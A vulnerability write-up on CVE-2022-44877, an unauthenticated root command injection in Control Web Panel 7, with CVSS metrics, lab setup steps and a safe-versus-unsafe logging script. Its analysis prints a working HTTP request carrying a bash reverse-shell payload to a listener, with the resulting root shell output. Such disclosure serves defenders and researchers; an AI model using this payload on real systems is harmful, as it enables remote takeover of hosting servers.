Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2022-44877

Disclosure Date: January 05, 2023
Exploited in the Wild
MITRE ATT&CK tactics: Execution (validated), Initial Access (validated)

Description

login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.

3 Ratings
Technical Analysis

This vulnerability is all about “Why Quotes Matter”

In December 2022, security researcher Numan Türle from Gais Cyber Security discovered an unauthenticated remote code execution vulnerability in the Control Web Panel 7 (CWP) application. They state on their website that CWP is a World Leading advanced Free and PRO web hosting panel that gives you all the flexibility to effectively and efficiently manage your server and clients.

The vulnerability is exposed through the admin endpoint /login/index.php?login, which typically runs on port 2030 or 2086 for HTTP and port 2031 or 2087 for HTTPS. Successful exploitation results in command execution as the root user. CWP versions 0.9.8.1146 and below are vulnerable.

The issue is triggered by the improper use of quotes when a failed login entry is written to /var/log/cwp_client_login.log.
The example below shows why the proper use of quotes matters in a Unix shell.

[root@localhost ~]# echo "$(whoami)"
root
[root@localhost ~]# echo '$(whoami)'
$(whoami)
[root@localhost ~]# echo "'$(whoami)'"
'root'
[root@localhost ~]# echo ''$(whoami)''
root

In the first example, the inline bash command $(whoami) gets executed within the echo command because it is inside double quotes.
However, if you use single quotes, it is treated as text, which is the standard Unix shell behavior. But if you try to be smart and put double quotes around the single quotes, it again executes $(whoami), because the single quotes are themselves seen as text when surrounded by double quotes.
This is no secret to experienced Unix admins, but software developers can easily be tricked when they use underlying Unix shell commands and quotes in their programs.

And this is exactly the problem that triggers this vulnerability.
Let's have a quick look at what is going on under the hood.

Take the Burp request below, where we trigger a failed login entry using the existing default user root with a wrong password.

POST /login/index.php?login= HTTP/1.1
Host: 192.168.100.89:2031
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=idonotcare&commit=Login

If we monitor /var/log/cwp_client_login.log, we can see a failed login entry.

[root@localhost ~]# tail -f /var/log/cwp_client_login.log
2023-01-14 17:37:04 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login='

Now we send the same Burp request, but with $(whoami) added to the login parameter.
And surprise, surprise, the whoami command gets executed (see the second log entry).

[root@localhost ~]# tail -f /var/log/cwp_client_login.log
2023-01-14 17:37:04 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login='
2023-01-14 17:40:25 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login=root'

Now let's try a bash reverse shell.

POST /login/index.php?login=$(bash -i >& /dev/tcp/192.168.100.7/4444 0>&1) HTTP/1.1
Host: 192.168.100.89:2031
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=idonotcare&commit=Login

And voila, a reverse shell as root user on the target.

# nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.100.89.
Ncat: Connection from 192.168.100.89:51988.
bash: no job control in this shell
[root@localhost login]# whoami
whoami
root
You have new mail in /var/mail/root
[root@localhost login]#

Another interesting detail is that you can actually see the command that writes the log entry in the process list.
The improper use of double quotes is clearly visible in this command line.

root     12238 12231  0 03:41 ?        00:00:00 sleep 17897
root     12493   910  0 03:43 ?        00:00:37 php-fpm: pool cwpsrv
postfix  27739  1538  0 07:41 ?        00:00:00 pickup -l -t fifo -u -o content_filter= -o receive_override_options=no_header_body_checks
root     29668     2  0 08:02 ?        00:00:00 [kworker/0:3]
root     30160     2  0 08:10 ?        00:00:00 [kworker/0:1]
root     30718     2  0 08:15 ?        00:00:00 [kworker/0:0]
root     30869  7118  0 08:17 ?        00:00:00 sh -c echo "2023-01-14 13:17:46 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login=$(bash -i >& /dev/tcp/192.168.100.7/4444 0>&1)'" >> /var/log/cwp_client_login.log
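The logging command above, rebuilt as a constructed pair of shell functions (added here, not CWP's own code): the unsafe one splices the login URL into a double-quoted command string handed to a second shell, exactly like the sh -c line in the process list, while the hardened one passes the URL to printf as an argument. The log file path, user name and URL are assumed values.

```shell
#!/bin/sh
# Constructed example, not CWP's code: a hypothetical failed-login logger
# written two ways. LOGFILE defaults to a temp file so the script runs anywhere.
LOGFILE="${LOGFILE:-$(mktemp)}"

# Vulnerable pattern (mirrors the sh -c line in the ps output): the untrusted
# URL is spliced into a double-quoted command string, then run by a second
# shell, which expands any $(...) inside the URL before echo ever sees it.
log_failed_login_unsafe() {
    user=$1; url=$2
    sh -c "echo \"$(date +%F) $user Failed Login on: '$url'\" >> \"$LOGFILE\""
}

# Hardened pattern: no second shell and no command-string building. The URL
# is an argument to printf's %s, so it is written out as literal bytes.
log_failed_login_safe() {
    user=$1; url=$2
    printf '%s %s Failed Login on: %s\n' "$(date +%F)" "$user" "'$url'" >> "$LOGFILE"
}

# Returns the most recent log entry, used to compare the two behaviours.
last_log_line() { tail -n 1 "$LOGFILE"; }

# Demo input (constructed): the login URL carries a harmless command substitution.
if [ "${1:-}" = "demo" ]; then
    u='https://localhost:2031/login/index.php?login=$(echo INJECTED)'
    log_failed_login_unsafe root "$u"; last_log_line   # ...login=INJECTED'
    log_failed_login_safe root "$u";   last_log_line   # ...login=$(echo INJECTED)'
fi
```

Note that the unsafe variant leaves only the substitution's output in the log, which is why the vulnerable server logged login=root rather than login=$(whoami).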

If you want to test it yourself, please follow this guidance to build a vulnerable configuration. Please do not expose this to the Internet unless you want to be compromised ;–)
Before you execute step 7 (sh cwp-el7-latest), please edit the file and make the following adjustments so that it downloads the vulnerable version and does not auto-update.

nano /usr/local/src/cwp-el7-latest
>>>>>
# wget static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1148.zip
# unzip -o -q cwp-el7-0.9.8.1148.zip
# rm -f cwp-el7-0.9.8.1148.zip

wget static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1146.zip
unzip -o -q cwp-el7-0.9.8.1146.zip
>>>>>
# update cwp
chmod +x /scripts/cwp_api
# sh /scripts/update_cwp
sh /scripts/cwp_set_memory_limit
>>>>>

After running the installation script, which takes about 30 minutes, please rename /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp to update_cwp.something, otherwise CWP will be updated to the latest version when you start the application.

Mitigation

The CWP application has an auto-update feature that cannot be disabled in the application. Therefore the likelihood of finding any vulnerable CWP application in the wild is almost zero.

I have created a Metasploit module. A local version of this module can be found in the References section.

References

  • Github
  • Packetstorm
  • Metasploit Development h00die-gr3y

Credits

Credit goes to the security researcher below, who discovered and analyzed this vulnerability.

CVSS V3 Severity and Metrics

Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • control-webpanel

Products

  • webpanel